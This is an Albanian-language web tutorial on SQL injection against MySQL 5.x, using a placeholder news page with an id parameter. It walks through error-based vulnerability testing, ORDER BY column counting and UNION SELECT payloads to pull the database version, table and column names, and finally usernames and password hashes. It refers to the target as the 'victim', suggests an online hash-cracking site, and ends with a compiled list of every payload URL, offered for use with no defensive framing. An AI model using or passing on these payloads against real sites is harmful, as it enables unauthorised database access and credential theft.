Navigation |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1.SQL-injetion-Tutorial për Versionin 5.x.x
----------------------------------------------------
1.1 Cka është SQL-injetion?
1.2 Provo faqen për vulnerability!
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
1.4 Provo për UNION SELECT funksionin!
1.5 Si të zbulojmë verzionin e MYSQL-së?
1.6 Si të zbulojmë Table_name?
1.7 Si të zbulojmë Column_name?
1.8 Përfundim?
============================
1.1 Cka është SQL-injetion?
============================
SQL-injetion është një ndër metodat më të përdorura ditët e sodit për të marrë akses në ndonjë webfaqe.
Kjo metodë i jep leje sulmuesit që të sulmon përmes URL-së.
Me këtë metodë sulmuesi ka mundësi të marrë informata të ndryshme nga MYSQL-së,(username,passwords), logins të ndryshëm,
akses nëpër faqe të administrimit, CC etj...
====================================
1.2 Provo faqen për vulnerability!!
====================================
Të themi se kemi dicka të till:
----------------------------------
http://www.site.com/vesti.php?id=1
----------------------------------
Tani që të testojm se a është faqa vulnerability, apo thjesht ka buggs shkojmë dhe ja shtojmë ' pra presjen lart, e cila
do të duket kështu:
-----------------------------------
http://www.site.com/vesti.php?id=1'
-----------------------------------
Pra pas këtij veprimi, nëse na jepë ndonjë error si prsh:
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
"You have an error in your SQL syntax;" ose "Warning: mysql_result() [function.mysql-result]:"
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++
Me këtë nënkuptohet se faqja është vulnerability, pra ka lëshime!
================================================== ===
1.3 Si të zbulojmë sa numra të kolumnave egzistojnë?
================================================== ===
Për të gjetur sa Kolumna kemi, përdorim: ORDER BY
Pra (order by) do të na ndihmon të gjejmë sa kolumna kemi në faqen e viktimës, shkojmë në shëmbull:
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
----------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 5-- <--> Error page - Pra këtu kemi Error
----------------------------------------------------------------------------------------------------
Me këtë nënkuptojmë se tek kjo faqe kemi 4 Kolumna, pra e heqim (5) numrin e fundit i cili jep error!
e lejmë kështu: http://www.site.com/vesti.php?id=1 order by 4--
=======================================
1.4 Provo për UNION SELECT funksionin!
=======================================
Pra tani do të provojmë që të nxjerim numrat e kolumnave dhe të dhënat të tjera në dritare, përmes (Union select).
Nëse kemi 4 numra të kolumnave në shembull, do të dukej dicka e tillë:
---------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
---------------------------------------------------------
Nëse në faqe na shfaqet ndonjëri prej numrave prej 1-4 atëherë është mirë funksionon gjithçka në rregull por në qoft se jo
atëhere provoni të ja shtoni nji - (minus) përpara tek (1)
shembull:
----------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
----------------------------------------------------------
Tani duhet të shfaqet ndonjëri prej 4 numrave prej 1-4.
Nëse shfaqet ndonjëri prej këtyre numrave atëhere gjithcka është në rregull!
=========================================
1.5 Si të zbulojmë verzionin e MYSQL-së?
=========================================
Si të zbulojmë verzionin e mysql-së është lehtë, këte mundemi të bëjmë duke zevendesuar numrin e kolumnës me këtë (@@version).
Më pas duhet të na shfaqet se cfarë verzioni është prezent në faqen e viktimës.
Të themi se numri i cili shfaqet është (3) për të treguar më qart do ju tregoj me shëmbullin më poshtë:
------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
------------------------------------------------------------------
Dhe tani do të na shfaqet versioni.
===============================
1.6 Si të zbulojmë Table_name?
===============================
----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
----------------------------------------------------------------------------------------------------------------------------------------------
Dhe Tani do të na shfaqet emri tabelës prsh: (users).
================================
1.7 Si të zbulojmë Column_name?
================================
E njëjta gjë vlen edhe per gjetjen e kolumnave(column_name) sikur tek table_name!
Në vënd ku shkruan
(table_name) & tables duhet vendosur (column_name) & columns.
Shkojmë të shfaqim edhe këtë shëmbull:
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
Të themi që column_name janë (username, password).
Ja kështu duhet vepruar që të na shfaqet (Username, Passwordi ose Hashi):
---------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--
---------------------------------------------------------------------------------------------------------
Dhe tani na shfaqen (Username, Passwordi ose Hashi)
nëse del (hashi) këtu mundë ta Crackoni:
-----------------------------------
http://gdataonline.com/seekhash.php
-----------------------------------
===============
1.8 Përfundim?
===============
Si përfundim do ti postoj të gjitha linqet në një vënd që ta keni më të lehtë për tu bazuar!
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1'
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 1-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 2-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 3-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 order by 4-- <--> Hapet faqja normal pra nuk na jep Error
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,3,4--
------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,@@version,4--
----------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
------------------------------------------------------------------------------------------------------------------------------------------------
http://www.site.com/vesti.php?id=-1 union select 1,2,group_concat(username,0x3a,password,),4 from users--
|
|
|
|
|
|
|
Today, there have been 40 visitors (175 hits) on this page! |
|
|
|
|
|
|
|